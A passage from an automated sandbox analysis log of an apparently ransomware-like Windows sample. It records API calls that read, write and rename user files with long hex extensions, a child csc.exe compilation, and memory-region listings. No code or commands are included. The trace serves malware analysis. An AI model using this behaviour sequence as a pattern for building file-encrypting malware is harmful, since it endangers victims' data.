lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.296] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0169.298] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif", lpString2=".3C744E04E9AD412AC5F17CC29BC14F4F2D02092BC91C14C7CF223A4A170ED56F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif.3C744E04E9AD412AC5F17CC29BC14F4F2D02092BC91C14C7CF223A4A170ED56F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif.3C744E04E9AD412AC5F17CC29BC14F4F2D02092BC91C14C7CF223A4A170ED56F" [0169.298] GetProcessHeap () returned 0x270000 [0169.298] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267eb8 [0169.298] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x73dfc44, FileInformation=0x4267eb8, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0169.300] CloseHandle (hObject=0x590) returned 1 [0169.301] GetProcessHeap () returned 0x270000 [0169.303] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0169.316] RtlInterlockedCompareExchange64 () returned 0x0 [0169.316] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.827] ReadFile (in: hFile=0x594, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0170.827] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.827] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x7821210, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7821210, ReturnLength=0x73dfc54) returned 0x0 [0170.829] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", lpString2=".FB00FF4D1BB6C96F9569AEDA1C6AB0D005FCC4033416FAC37A0DACFEE71D697E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.FB00FF4D1BB6C96F9569AEDA1C6AB0D005FCC4033416FAC37A0DACFEE71D697E") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.FB00FF4D1BB6C96F9569AEDA1C6AB0D005FCC4033416FAC37A0DACFEE71D697E" [0170.829] GetProcessHeap () returned 0x270000 [0170.829] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x160) returned 0x77339e8 [0170.829] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x77339e8, Length=0x160, FileInformationClass=0xa) returned 0x0 [0170.832] CloseHandle (hObject=0x5b4) returned 1 [0170.833] GetProcessHeap () returned 0x270000 [0170.834] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7821160 | out: hHeap=0x270000) returned 1 [0170.834] RtlInterlockedCompareExchange64 () returned 0x4 [0170.834] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.834] NtQueryObject (in: Handle=0x5f4, ObjectInformationClass=0x1, ObjectInformation=0x7849368, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7849368, ReturnLength=0x73dfc54) returned 0x0 [0170.836] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", lpString2=".AA0ABDBC58C7F37C75BD84BFFD1140FC24E74225AF294C6B4F3925E5764BCB20" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.AA0ABDBC58C7F37C75BD84BFFD1140FC24E74225AF294C6B4F3925E5764BCB20") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.AA0ABDBC58C7F37C75BD84BFFD1140FC24E74225AF294C6B4F3925E5764BCB20" [0170.836] GetProcessHeap () returned 0x270000 [0170.836] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35bfb0 [0170.836] NtSetInformationFile (FileHandle=0x5f4, IoStatusBlock=0x73dfc44, FileInformation=0x35bfb0, Length=0x158, FileInformationClass=0xa) returned 0x0 [0170.838] CloseHandle (hObject=0x5f4) returned 1 [0170.839] GetProcessHeap () returned 0x270000 [0170.840] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78492b8 | out: hHeap=0x270000) returned 1 [0170.851] RtlInterlockedCompareExchange64 () returned 0x3 [0170.851] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.851] NtQueryObject (in: Handle=0x5f0, ObjectInformationClass=0x1, ObjectInformation=0x78714c0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78714c0, ReturnLength=0x73dfc54) returned 0x0 [0170.852] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", lpString2=".EC67870BE36E0F273A9068FD8E461379CFD96C3C4A75CF1AB9A8191129BA8D0D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.EC67870BE36E0F273A9068FD8E461379CFD96C3C4A75CF1AB9A8191129BA8D0D") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.EC67870BE36E0F273A9068FD8E461379CFD96C3C4A75CF1AB9A8191129BA8D0D" [0170.852] GetProcessHeap () returned 0x270000 [0170.853] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35c118 [0170.853] NtSetInformationFile (FileHandle=0x5f0, IoStatusBlock=0x73dfc44, FileInformation=0x35c118, Length=0x152, FileInformationClass=0xa) returned 0x0 [0170.854] CloseHandle (hObject=0x5f0) returned 1 [0170.877] GetProcessHeap () returned 0x270000 [0170.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7871410 | out: hHeap=0x270000) returned 1 [0170.902] RtlInterlockedCompareExchange64 () returned 0x1 [0170.902] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.905] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x78c10b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78c10b8, ReturnLength=0x73dfc54) returned 0x0 [0170.906] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log", lpString2=".23FF2278379EB989E1C94ABD0766001DDA671D57CE91789ED4BBA1B2B179CB35" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.23FF2278379EB989E1C94ABD0766001DDA671D57CE91789ED4BBA1B2B179CB35") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.23FF2278379EB989E1C94ABD0766001DDA671D57CE91789ED4BBA1B2B179CB35" [0170.907] GetProcessHeap () returned 0x270000 [0170.907] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x4258978 [0170.907] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x73dfc44, FileInformation=0x4258978, Length=0x142, FileInformationClass=0xa) returned 0x0 [0170.909] CloseHandle (hObject=0x5b0) returned 1 [0170.910] GetProcessHeap () returned 0x270000 [0170.912] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1008 | out: hHeap=0x270000) returned 1 [0170.912] RtlInterlockedCompareExchange64 () returned 0x0 [0170.912] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0171.816] WriteFile (in: hFile=0x604, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0171.834] RtlInterlockedCompareExchange64 () returned 0x4 [0171.834] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0172.032] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x78c10b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78c10b8, ReturnLength=0x73dfc54) returned 0x0 [0172.033] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpString2=".533A448C3890A9C9046073548251B78B5146F7ABEE7D82E37A2043A16CF1AB69" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.533A448C3890A9C9046073548251B78B5146F7ABEE7D82E37A2043A16CF1AB69") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.533A448C3890A9C9046073548251B78B5146F7ABEE7D82E37A2043A16CF1AB69" [0172.033] GetProcessHeap () returned 0x270000 [0172.033] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x43338f8 [0172.033] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x73dfc44, FileInformation=0x43338f8, Length=0x124, FileInformationClass=0xa) returned 0x0 [0172.136] CloseHandle (hObject=0x590) returned 1 [0172.138] GetProcessHeap () returned 0x270000 [0172.139] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1008 | out: hHeap=0x270000) returned 1 [0172.141] RtlInterlockedCompareExchange64 () returned 0x3 [0172.141] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff) Thread: id = 112 os_tid = 0xdb4 Thread: id = 113 os_tid = 0xdac Process: id = "2" image_name = "csc.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe" page_root = "0x7ef47c60" os_pid = "0x94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xfac" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline\"" cur_dir = "C:\\Windows\\system32\\" os_username = "MYB7ZA2AF\\5AlR3U30D3" bitness = "32" os_groups = "MYB7ZA2AF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e73d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 595 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 596 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 597 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 598 start_va = 0x1a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 599 start_va = 0xfa0000 end_va = 0x11aefff monitored = 0 entry_point = 0x116bb80 region_type = mapped_file name = "csc.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe") Region: id = 600 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 601 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 603 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 604 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 605 start_va = 0x3a0000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 606 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 607 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 608 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 609 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 610 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 611 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 612 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 613 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 614 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 615 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 616 start_va = 0x70790000 end_va = 0x707a3fff monitored = 0 entry_point = 0x7079ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 617 start_va = 0x6c2f0000 end_va = 0x6c39afff monitored = 0 entry_point = 0x6c385f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 618 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 619 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 620 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 621 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 622 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 623 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 624 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 625 start_va = 0x76120000 end_va = 0x76124fff monitored = 0 entry_point = 0x76121438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 626 start_va = 0x570000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 627 start_va = 0x71990000 end_va = 0x71992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 628 start_va = 0xc0000 end_va = 0x187fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 629 start_va = 0x3a0000 end_va = 0x3bcfff monitored = 0 entry_point = 0x3a1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 630 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 631 start_va = 0x3a0000 end_va = 0x3bcfff monitored = 0 entry_point = 0x3a1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 632 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 633 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 634 start_va = 0x570000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 635 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 636 start_va = 0x11b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 637 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 638 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 639 start_va = 0x3b0000 end_va = 0x3e2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\1033\\cscui.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\1033\\cscui.dll") Region: id = 640 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 641 start_va = 0x3f0000 end_va = 0x44bfff monitored = 0 entry_point = 0x4135b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 642 start_va = 0x3f0000 end_va = 0x44bfff monitored = 0 entry_point = 0x4135b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 643 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 644 start_va = 0x3f0000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 645 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 646 start_va = 0x69ef0000 end_va = 0x69f15fff monitored = 1 entry_point = 0x69f06bb0 region_type = mapped_file name = "alink.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\alink.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\alink.dll") Region: id = 647 start_va = 0x76a50000 end_va = 0x76a79fff monitored = 0 entry_point = 0x76a512fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 648 start_va = 0x6e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 649 start_va = 0x6fb70000 end_va = 0x6fbb9fff monitored = 1 entry_point = 0x6fb72e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 650 start_va = 0x6e0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 651 start_va = 0x8a0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 652 start_va = 0x680000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 653 start_va = 0x6c430000 end_va = 0x6c4bcfff monitored = 1 entry_point = 0x6c442860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 654 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 655 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 656 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 657 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 658 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 659 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 660 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 661 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 662 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 663 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 664 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 665 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 666 start_va = 0x8e0000 end_va = 0xbaefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 667 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: 